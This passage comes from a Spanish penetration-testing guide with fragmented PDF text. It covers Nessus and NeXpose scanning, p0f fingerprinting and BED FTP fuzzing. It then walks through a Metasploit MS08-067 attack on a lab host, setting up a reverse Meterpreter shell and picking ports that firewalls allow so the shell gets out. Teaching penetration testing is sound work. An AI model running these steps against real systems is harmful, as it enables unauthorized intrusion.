descubrimiento de fallas en los sistemas y aplicaciones que pueden ser aprovechadas por un
atacante. Estos defectos pueden variar desde el host y errores de configuracin de servicios,
o el diseo de aplicaciones inseguras. Aunque el proceso utilizado para buscar defectos
vara, y depende en gran medida del componente en particular puesto a prueba, algunos
principios fundamentales se aplican en el proceso.
Activo
Pasivo
De validacin
De investigacin
70
71
72
Una vez finalizada la exploracin con NeXpose, la base de datos que cre anteriormente
debe contener los resultados de la exploracin de vulnerabilidades. Para ver los resultados,
ingrese db_hosts, como se muestra a continuacin. (En este ejemplo, la salida ha sido
recortada por el filtrado de la columna de direccin.)
msf > db_hosts -c address
Hosts
=====
address
Svcs
Vulns
-------------192.168.1.195
8
7
msf >
Workspace
--------default
Como puede ver, NeXpose ha descubierto siete vulnerabilidades. Ejecute db_vulns para
mostrar las vulnerabilidades encontradas:
msf > db_vulns
Antes de comenzar un anlisis, primero tiene que crear una poltica de exploracin. En la
ficha Polticas, haga clic en el botn verde Agregar para abrir la ventana de configuracin
de la poltica como se muestra en la figura 2.
74
i.
ii.
Vamos a configurar a Nessus para que realice las exploraciones a utilizando las
credenciales de Windows de inicio de sesin para obtener una imagen ms completa
de las vulnerabilidades presentes en el sistema evaluado. Escriba las credenciales de
inicio de sesin para el sistema objetivo y haga clic en Siguiente.
75
iii.
76
iv.
77
Despus de haber creado las polticas de exploracin, Nessus est listo para realizar
un anlisis. Comience por seleccionar la ficha Anlisis, y luego haga clic en el
botn Agregar para abrir la ventana de configuracin de escaneo. La mayor parte
de configuracin de Nessus se encuentra en sus polticas de anlisis, as que cuando
usted est configurando una exploracin, escriba un nombre para el anlisis, elegir
una poltica, e ingrese los objetivos para anlisis, como se muestra en la Figura 6.
En nuestro ejemplo, exploraremos a un solo host, pero tenga en cuenta que tambin se
pueden ingresa rangos de direcciones IP en notacin CIDR o incluso cargar un archivo que
contiene las direcciones de los objetivos que desea analizar. Cuando est satisfecho con la
configuracin de escaneo, haga clic en Iniciar exploracin.
78
79
Existe un mtodo pasivo para hallar las huellas digitales (fingerprints) de un sistema
operativo. Este mtodo fue iniciado por Michal Zalewsky cuando lanz una herramienta
llamada p0f. La desventaja del mtodo pasivo es que el proceso va a ser ms lento en
comparacin con el mtodo activo.
Herramienta p0f
La herramienta p0f es utilizada para obtener la huella digital de un sistema operativo de
forma pasiva. Se puede identificar un sistema operativo en:
Las mquinas que se conectan a la caja (modo SYN, este es el modo por
defecto)
Funciona mediante el anlisis de los paquetes TCP enviados durante las actividades que
realiza red, tales como conexiones entrantes y conexiones de salientes. Este proceso es
completamente pasivo, por lo que no generar ningn trfico de red.
80
Observamos que p0f est escuchando por la NIC eth0 en modo SYN.
Luego necesita generar actividades de red relacionadas con conexiones TCP, como por
ejemplo navegar en la mquina remota o dejar que la mquina remota se conecte a su
mquina.
Si p0f ha capturado con xito las huellas digitales del sistema operativo de la mquina
remota, podr observar cual es el sistema operativo de la mquina remota en el archivo de
registro (p0f.log). Usted puede abrir este archivo de registros usando el editor de texto
kate
81
Anlisis Fuzzy
El anlisis Fuzzy es un software especialmente de pruebas utilizado por los auditores y por
los desarrolladores para probar sus aplicaciones contra un conjunto de datos de entrada
inesperados, no vlidos y aleatorios.
La reaccin de las aplicaciones se ver en trminos de excepciones o colisiones. Esta
actividad revela algunas de las principales vulnerabilidades en el software, que de otro
modo no son posibles de descubrir. Estos incluyen desbordamientos de bfer, cadenas de
formato, las inyecciones de cdigo, los punteros colgantes, las condiciones de prueba,
condiciones de denegacin de servicio, y muchos otros tipos de vulnerabilidades. Hay
diferentes clases de fuzzers disponibles en BackTrack 5 que se pueden utilizar para poner a
prueba los formatos de archivo, protocolos red, entradas de lnea de comandos, variables
de entorno y aplicaciones web. Cualquier fuente de datos de entrada no confiables se le
82
83
Las instrucciones de uso ahora aparecern en la pantalla. Es muy importante anotar que una
las descripciones de un plug-in especfico se pueden mostrar por el siguiente comando:
# ./bed.pl s FTP
Con el ejemplo anterior, podemos aprender a usar los parmetros requeridos por un plugin, en este caso el del FTP, antes de la ejecucin de una prueba. Estos incluyen el nombre
de usuario FTP u username y
El resultado sera:
BED 0.5 by mjm ( www.codito.de ) & eric ( www.snake-basket.de)
+ Buffer overflow testing:
testing: 1
USER XAXAX ...........
testing: 2
USER ftpuserPASS XAXAX ...........
+ Formatstring testing:
testing: 1
USER XAXAX .......
testing: 2
USER ftpuserPASS XAXAX .......
* Normal tests
+ Buffer overflow testing:
testing: 1
ACCT XAXAX ...........
testing: 2
APPE XAXAX ...........
testing: 3
ALLO XAXAX ...........
testing: 4
CWD XAXAX ...........
testing: 5
CEL XAXAX ...........
testing: 6
DELE XAXAX ...........
testing: 7
HELP XAXAX ...........
testing: 8
MDTM XAXAX ...........
testing: 9
MLST XAXAX ...........
testing: 10
MODE XAXAX ...........
testing: 11
MKD XAXAX ...........
testing: 12
MKD XAXAXCWD XAXAX ...........
testing: 13
MKD XAXAXDELE XAXAX ...........
testing: 14
MKD XAXAXRMD XAXAX .....
connection attempt failed: No route to host
84
Por el reporte podemos anticipar que el demonio FTP remoto se ha interrumpido durante la
prueba 14. Esto podra ser una clara indicacin de error de desbordamiento de buffer, sin
embargo, el problema mayor puede ser investigado observando el plug-in o complemento
especfico y localizando el patrn del caso en prueba (por ejemplo, pentest/fuzzers/bed/
bedmod/ ftp.pm). Siempre es una buena idea para poner a prueba su objetivo al menos dos
o ms veces restendolo a su estado normal, aumentando el valor de tiempo de espera (-o) y
comprobar si el problema es reproducible.
FASE V:
Explotacin de las vulnerabilidades: La fase de explotacin de una prueba de penetracin
se centra exclusivamente en el establecimiento de un sistema de acceso a los recursos o
saltarse las restricciones de seguridad. Si la fase previa, anlisis de vulnerabilidad se ha
realizado correctamente, esta fase debe estar bien planificada y el ataque debe ser
preciso. El objetivo principal es identificar el punto de entrada principal en la organizacin
y para identificar los activos de alto valor objetivo.
Esta fase tiene como objeto realizar:
Contramedidas
Evasin
ngulo de da cero
86
normal
admin/mssql/mssql_idf
normal
admin/mssql/mssql_sql
scanner/mssql/mssql_login
scanner/mssql/mssql_ping
Exploits
normal
normal
normal
87
Description
------------Microsoft SQL Server Configuration
Enumerator
Microsoft SQL Server xp_cmdshell
Command Execution
Microsoft SQL Server - Interesting
Data Finder
Microsoft SQL Server Generic Query
MSSQL Login Utility
MSSQL Ping Utility
. . . SNIP . . .
msf >
O bien, para encontrar el exploit MS08-067 en concreto (un exploit relacionado con el
famoso gusano Conficker que se aprovechaba de una debilidad dentro de la llamada a
procedimiento remoto [RPC] de servicio), tiene que escribir el siguiente comando:
msf > search ms08_067
[*] Searching loaded modules for pattern 'ms08_067'...
Exploits
========
Name
Rank
Description
----------------windows/smb/ms08_067_netapi great
Microsoft Server Service Relative Path Stack Corruption
Esto indica que hemos seleccionado el mdulo ms08_067_netapi y que las rdenes
emitidas en este sistema se llevarn a cabo en bajo este exploit. Ahora, con nuestro mdulo
cargado en el prompt, podemos ingresar el comando show options para mostrar las
opciones especficas para el exploit MS08-067:
88
Description
----------The target address
Set the SMB service port
The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id
Name
----0
Automatic Targeting
msf exploit(ms08_067_netapi) >
89
caso de los exploit basados en Microsoft Windows, estos payloads pueden ser tan simples
como un smbolo del sistema C:> o root@user:~#) en el destino o tan complejo como
una interfaz grfica completa en la mquina objetivo. Para ver una lista activa de cargas
tiles, ejecute el comando siguiente:
msf> show payloads
Esto le mostrar todas los payloads tiles disponibles en Metasploit, sin embargo, si se est
con un exploit activo, ver slo los payloads que se aplica a este ataque. Por ejemplo, al
ejecutar show payloads desde la lnea de comando msf exploit (ms08_067_netapi) dara
lugar a la salida que se muestra a continuacin.
En el ejemplo anterior hemos buscado el mdulo MS08-067. Ahora vamos a averiguar los
payloads para este mdulo mediante la introduccin del comando show payloads. Observe
en este ejemplo que los Payloads que se muestran slo son los que estn basado en
Windows. Metasploit generalmente identifica el tipo de payloads que pueden ser utilizados
en un ataque en particular.
msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name
Rank
------. . . SNIP . . .
windows/shell/reverse_ipv6_tcp
normal
windows/shell/reverse_nonx_tcp
normal
windows/shell/reverse_ord_tcp
normal
90
Description
----------Windows Command Shell, Reverse TCP
Stager (IPv6)
Windows Command Shell, Reverse TCP
Stager (No NX or Win7)
Windows Command Shell, Reverse
normal
windows/shell/reverse_tcp_allports
normal
windows/shell_bind_tcp
normal
windows/shell_reverse_tcp
normal
Required
-------yes
yes
yes
Description
----------Exit technique: seh, thread, process
The local address
The local port
Observe que cuando el payload es seleccionado y las opciones se muestran, se nos presenta
con algunas opciones adicionales en la seccin del payload, como LHOST y LPORT. En
este ejemplo, podra configurar el payload para conectar a la mquina atacante en una
direccin especfica IP y el nmero de puerto, llamado payload inverso (reverse payload).
En esta, la conexin es en realidad llevada a cabo por la mquina de objetivo y se conecta
91
con la del atacante. Usted puede utilizar esta tcnica para evitar un firewall o un NAT.
Vamos a configurar este exploit con las opciones LHOST y RHOST. LHOST, en la
mquina atacante, se conectar de nuevo a la mquina de destino (RHOST) en el puerto
TCP por defecto (4444).
msf>show targets
Los mdulos a menudo muestran una lista de posibles objetivos vulnerables. Por ejemplo,
la vulnerabilidad MS08-067 est basada en los cdigos no modificables de las direcciones
de memoria, los exploit deben ser especficos para ciertos sistemas operativos con los
niveles de parches especficos, versin lenguaje e implementacin de seguridad. Usando el
comando show target en la lnea de comando msf MS08-067 se muestra una lista de los
60 objetivos a explotar (con slo una porcin como se muestra en el siguiente ejemplo).
El
est
xito
de
un
exploit depender
atacando. A veces, la
de
la versin
de
Windows
que
se
activar el exploit equivocado, lo que suele dar lugar a una detencin del servicio.
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
----0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
92
En este ejemplo, se puede ver que en la lista de exploit Automatic Targeting como una
opcin. A menudo, un mdulo exploit intentar acceder el sistema operativo de forma
automtica, en funcin de su versin y de seleccin de un exploit basado en su huella
digital (fingerprint). Sin embargo, a menudo es mejor tratar de identificar el exploit
adecuado uno mismo para evitar el desencadenamiento de un exploit incorrecto con unos
resultados potencialmente catastroficos.
93
Id
-3
Name
---Windows XP SP2 English (NX)
94
95
banderas
TCP en modo furtivo, la cual es la bandera ms confiable cuando se trata de enumerar los
puertos. (Otros prefieren -sS, o SYN Stealth.) La opcin A especifica una deteccin
avanzada del sistema operativo (OS), la cual tambin realiza algunas capturas de
banners adicionales y de huella digitales de un servicio especfico.
Observe
que
en los
067: VULNERABLE.
resultados
Este
es
de NMap
un buen
se
reporta
indicio
de
la
vulnerabilidad MS08-
que tenemos la
oportunidad
de explotar este sistema. Usaremos a Metasploit para encontrar el exploit que queremos
usar para comprometer el sistema. Este exploit es especfico para la versin del sistema
operativo, para el Service Pack y para el lenguaje usado en el sistema.
decir
que
el
sistema est
96
Module options:
Name
Current Setting
-----------------RHOST
192.168.33.130
RPORT
445
SMBPIPE
BROWSER
Required
-------yes
yes
yes
Description
----------The target address
Set the SMB service port
The pipe name to use (BROWSER, SRVSVC)
Current Setting
--------------thread
192.168.33.129
8080
Required
-------yes
yes
yes
Exploit target:
97
Description
----------Exit technique: seh, thread, process
The local address
The local port
Id
-3
Name
---Windows XP SP2 English (NX)
Primero buscamos el exploit para MS08-067 NetAPI. Entonces teniendo a nuestro exploit,
cargamos el exploit windows/smb/ms08_067_netapi. Posteriormente configuramos el
payload basado en el Meterpreter reverse_tcp de Windows, el cual comenzar una
conexin con la maquina objetivo y conectar de nuevo a la mquina atacante especificada
con LHOST. Esto es importante si te encuentras con que un servidor de seguridad est en
su lugar y hay que evitar los controles de entrada en un cortafuego o NAT. Meterpreter es
una herramienta de explotacin que vamos a utilizar a travs de este ejemplo. Una de las
herramientas emblemticas de Metasploit, hace que la extraccin de informacin de los
sistemas comprometidos sea mucho ms fcil. El comando show target nos permite
identificar el sistema que queremos atacar. (Aunque muchos exploits de MSF utiliza la
orientacin automtica y no requieren de esta bandera, la capacidad de deteccin
automtica en general, no en MS08-067.) A continuacin, establecemos nuestro objetivo a
Windows XP SP2 Ingls (NX). NX est configurado en No Ejecutar (No Execute). De
forma predeterminada en Windows XP SP2, DEP est habilitado. Luego configuramos la
direccin IP del equipo de destino definindolo en RHOST. El comando LHOST especifica
la direccin IP de nuestra mquina atacante, y la opcin LPORT especifica el puerto por el
cual nuestra mquina atacante escucha la conexin de nuestro objetivo. (Cuando est
configurando la opcin LPORT, utilice un puerto estndar que esta permite a travs del
firewall: Puertos 443, 80, 53, y 8080 son a menudo buenas Opciones.) Por ltimo,
ingresamos show options en la opcion
98
Type
---meterpreter
Information
-----------
Connection
---------192.168.33.129:8080 -> 192.168.33.130:1036
El comando exploit inicia nuestro exploit y trata de atacar a el objetivo. El ataque tiene
xito y nos da un Meterpreter reverse_tcp , la que podemos ver con el comando sesions -l .
Slo una sesin est activa, pero si atacamos mltiples sistemas, varias sesiones se podran
abrir simultneamente. (Para ver una lista de los exploit que crearon cada sesin, tenemos
que ingresar sesions l v.) El comando sesions -i se usa en para interactuar con un sesion
individual. Tenga en cuenta que esto nos deja en el Shell del Meterpreter. Por ltimo,
entramos al smbolo del sistema en la maquina objetivo.
99
4. CONCLUSIONES Y RECOMENDACIONES
Finalmente se puede decir que estas herramientas se deben usar con sumo cuidado, puesto
que podran acarrear graves problemas sobre la maquina atacada. Estas prcticas estn
reguladas por las leyes informticas en cada pas, su uso es exclusivo para hacking tico.
Esta gua es solo introductoria para las pruebas de penetracin, es decir que para
profundizar se debe indagar sobre cada una de las herramientas aqu descritas. Es necesario
aclarar que este tema es muy extenso y depende, en gran manera, de la pericia y la
experiencia del pen-tester.
100
5. BIBLIOGRAFIA
http://www.pentest-standard.org/
http://web.mit.edu/rhel-doc/4/RH-DOCS/rhel-sg-es-4/
SecurityFocus
101
102
103